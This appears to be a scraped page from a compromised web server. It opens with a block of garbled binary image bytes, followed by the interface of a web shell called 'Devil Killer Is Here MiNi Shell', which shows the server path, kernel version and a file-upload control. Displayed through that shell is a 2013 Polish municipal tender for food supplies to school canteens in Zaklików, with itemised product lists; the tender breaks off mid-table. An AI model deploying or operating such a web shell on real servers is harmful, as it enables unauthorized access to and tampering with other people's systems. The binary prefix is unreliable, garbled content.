JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/148919-N-2013.html

<p class="kh_header"><b>Zaklików: Sukcesywna dostawa artykułów spożywczych do stołówek szkolnych w Gminie Zaklików od dnia 2 września 2013 do dnia 27 czerwca 2014r. do
a)	Zespołu Szkół w Zdziechowicach,
b)	Publicznego Przedszkola w Zaklikowie
c)	Zespołu Szkół Ogólnokształcących w Zaklikowie</b><br>
<b>Numer ogłoszenia: 148919 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zaklików , ul. Zachodnia 15, 37-470 Zaklików, woj. podkarpackie, tel. 15 8738476, faks 15 8738324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zaklikow.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych do stołówek szkolnych w Gminie Zaklików od dnia 2 września 2013 do dnia 27 czerwca 2014r. do
a)	Zespołu Szkół w Zdziechowicach,
b)	Publicznego Przedszkola w Zaklikowie
c)	Zespołu Szkół Ogólnokształcących w Zaklikowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych do stołówek szkolnych 
w Gminie Zaklików w okresie od 1 września 2013 roku do 27 czerwca 2014 roku do szkół, dla których organem prowadzącym jest Gmina Zaklików:
a)	Zespołu Szkół w Zdziechowicach,
b)	Publicznego Przedszkola w Zaklikowie
c)	Zespołu Szkół Ogólnokształcących w Zaklikowie,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.11.00.00-2, 15.30.00.00-1, 03.14.25.00-3, 15.89.60.00-5, 15.81.00.00-9, 15.22.00.00-6, 15.40.00.00-2, 15.89.40.00-1, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Posiadają aktualną licencję na wykonywanie krajowego transportu drogowego osób stosownie do postanowień ustawy z dnia 6 września 2001r. o transporcie drogowym( Dz. U. 
z 2004 r. Nr 204, poz. 2088 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonywali w okresie ostatnich trzech lat usługi polegające na dostawie artykułów spożywczych. Wymagane jest przedstawienie, co najmniej jednego takiego zamówienia wykonywanego w trybie zamówień publicznych, z podaniem dat wykonania i odbiorców. 
Uwaga: Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero jedynkowym tj. spełnia -nie spełnia); nie spełnienie chociażby jednego z postawionych warunków z pkt.1 lub 2 niniejszego rozdziału SIWZ, spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że dysponują środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia.
Posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez komisję przetargową poprzez analizę złożonych dokumentów lub oświadczeń wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>b)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty-załącznik nr 1 do SIWZ
2.	Wypełniony załącznik nr 2, 2a, 2b, 2c, 2d, 2e, 2f, 2g, 2h, 2i do SIWZ - szczegółowe wymagania
3.	Wykaz zamówień realizowanych lub zrealizowanych w okresie ostatnich 36 miesięcy-załącznik nr 3 do SIWZ
4.	Oświadczenie o spełnieniu warunków udziału w postępowaniu-załącznik nr 4 do SIWZ
5.	Załącznik nr 5 do SIWZ - oświadczenie o atestach
6.	Zaakceptowany wzór umowy- załącznik nr 6 do SIWZ
7. Załącznik nr 7 do SIWZ - oświadczenie o wykonaniu całości zamówienia siłami własnymi lub o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zaklikow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.zaklikow.pl; Gmina Zaklików - Gminny Zespół Ekonomiczno-Administracyjny Szkół 37-470 Zaklików, ul. Zachodnia 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 09:30, miejsce: Gmina Zaklików - Gminny Zespół Ekonomiczno-Administracyjny Szkół 37-470 Zaklików, ul. Zachodnia 15, pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - mleko i przetwory mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie
Lp.	Opis artykułu Szczegółowy - skład, Opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Mleko 2%      1 l	Litr	10
2	Śmietana 22%	Litr	250
3	Jogurt owocowy 150g	szt	1500
4	Ser twarogowy	kg	120

2. Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu, Szczegółowy -Skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Śmietana 22%-1L-Gosposia-Krasnystaw	szt.	208
2	Śmietana Krasnystaw  12%-400g	szt.	38
3	Jogurt naturalny -Bakoma 400g	szt.	40
4	Jogurty owocowe- Zott 115g	szt.	874
5	Ser biały półtłusty kl.1	kg	69
6	Ser topiony salami-Mlekowita	kg	8,2
7	Serek plasterkowy-Hochland 150g	szt.	10
8	Serek Almette-Hochland 50g	szt.	12
9	Serki homogenizowane-Krasnystaw 80g	szt.	18
10	Mleko 2%-1L
Łaciate	szt.	278


3.Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowane go zakupy przed 10 m-cy
1	Mleko  - 2%  1 L	szt.	1600
2	Masło extra 250g-82% tłuszczu	szt.	400
3	Masło z olejem-200g 55% tłuszczu-Mazurskie	szt.	700
4	Śmietana -Krasnystaw 18%
400g	szt.	40
5	Śmietana Gosposia-Krasnystaw 22%
1kg	szt.	200
6	Serek waniliowy-Danone 50g	szt.	1000
7	Serek waniliowy-Danone 100g	szt.	700
8	Jogurt wieloowocowy Serduszko-125g	szt.	1000
9	Jogurt truskawkowy -Gratka 125g	szt.	1000
10	Ser żółty twardy-plastry 1kg-Edamski	kg	20
11	Ser żółty Salami-1kg	kg	20
12	Ser topiony Hochland do smarowania-100g	szt	100
13	Twaróg półtłusty w pergaminie 1kg	kg	180
14	Serek twarogowy Almette do smarowania-150g	szt	100
15	Deser mleczny Monte-90g	szt	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10m-cy
1	Kiełbasa domowa	kg	190
2	Boczek pieczony	kg	100
3	Kurczak cały	kg	220
4	Udo b/g	kg	300
5	Filet z kurczaka	kg	250
6	Porcja rosołowa	kg	200
7	Łopatka b/k	kg	100
8	Mięso mielone	kg	430
9	Schab b/k	kg	230
10	Karkówka	kg	70
11	Słonina	kg	80

2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowane go zakupy przed 10 m-cy
1	Kiełbasa śląska	kg	56
2	Mortadela wieprzowa	kg	81
3	Polędwica drobiowa-wędlina	kg	6,8
4	Parówkowa wieprzowa	kg	45
5	Parówki Matthiaski	kg	39,8
6	Boczek wędzony wieprzowy	kg	20,4
7	Boczek bez żeberek wieprzowy-surowy	kg	12
8	Schab wieprzowy b/k	kg	92,5
9	Szynka wieprzowa b/k	kg	201
10	Wątroba drobiowa z kurczaka	kg	9
11	Żeberka paski wieprzowe	kg	108,5
12	Karczek wieprzowy b/k	kg	24,6
13	Mięso mielone(luz) wieprzowe	kg	151,5
14	Filet indyczy świeży	kg	79,4
15	Filet z kurczaka świeży	kg	106,2
16	Udka całe świeże z kurczaka	kg	99,8
17	Udko pałka z kurczaka	kg	44,2
18	Skrzydełka z kurczaka	kg	12,1
19	Słonina wieprzowa	kg	19,4
20	Płucka wieprzowe	kg	8
21	Flaki wołowe cięte mrożone	kg	12


3.Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy -skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Kiełbasa zwyczajna	kg	60
2	Kiełbasa podlaska	kg	60
3	Kiełbasa żywiecka	kg	30
4	Szynka konserwowa	kg	40
5	Parówki wieprzowe	kg	180
6	Boczek wędzony	kg	50
7	Polędwica sopocka	kg	50
8	Pierś wędzona z indyka	kg	20
9	Szynka gotowana	kg	20
10	Schab pieczony	kg	20
11	Filet z indyka	kg	120
12	Schab b/k	kg	200
13	Mięso mielone-luz	kg	240
14	Filet drobiowy	kg	240
15	Porcja rosołowa ze skrzydełkami	kg	150
16	Udo bez grzbietów	kg	300
17	Wątróbka	kg	40
18	Słonina	kg	25
19	Szponder wołowy	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - owoce, warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupy przed 10 m-cy
1	Banany	kg	220
2	Jabłka	kg	320
3	Pomarańcze	kg	80
4	Truskawki	kg	30
5	Buraki czerwone	kg	320
6	Cebula	kg	270
7	Kapusta czerwona	kg	85
8	Kapusta biała	kg	280
9	Kapusta pekińska	szt	77
10	Koper pęczek	szt	130
11	Marchew	kg	750
12	Ogórek	kg	230
13	Pieczarki	kg	30
14	Pietruszka korzeń	kg	35
15	Pietruszka nać	szt	200
16	Pomidory	kg	30
17	Por	kg	27
18	Seler korzeń	kg	110
19	Sałata zielona	szt.	150
20	Ziemniaki	kg	5500
21	Fasola	kg	180
22	Groch łuskany	kg	45
23	Kapusta kiszona	kg	400
24	Ogórki kiszone	kg	70

2.	Zespół Szkół w Zdziechowicach
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupy przed 10 m-cy
1	Banany	kg	24
2	Jabłka	kg	85
3	Mandarynki	kg	26
4	Nektarynki	kg	19
5	Brzoskwinie	kg	28
6	Kiwi	kg	22
7	Winogrono białe i czerwone	kg	10
8	Pieczarki	kg	15
9	Pomidory	kg	16
10	Ogórki świeże	kg	34
11	Ogórki kwaszone	kg	34
12	Kapusta świeża	kg	78
13	Kapusta czerwona	kg	20
14	Kapusta pekińska	kg	16
15	Kapusta kiszona	kg	62
16	Kapusta biała młoda	szt.	30
17	Sałata	szt.	38
18	Koperek świeży (wiązka)	szt.	38
19	Rzodkiewka
(wiązka)	szt.	8
20	Szczypior
(wiązka)	szt.	22
21	Czosnek główki	kg	1,5
22	Cebula	kg	22
23	Buraczki	kg	60
24	Marchew	kg	100
25	Seler	kg	24
26	Ziemniaki	kg	679
27	Por świeży	kg	16
28	Fasola Jaś	kg	10
29	Fasola drobna	kg	8


3.	Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 12 m-cy
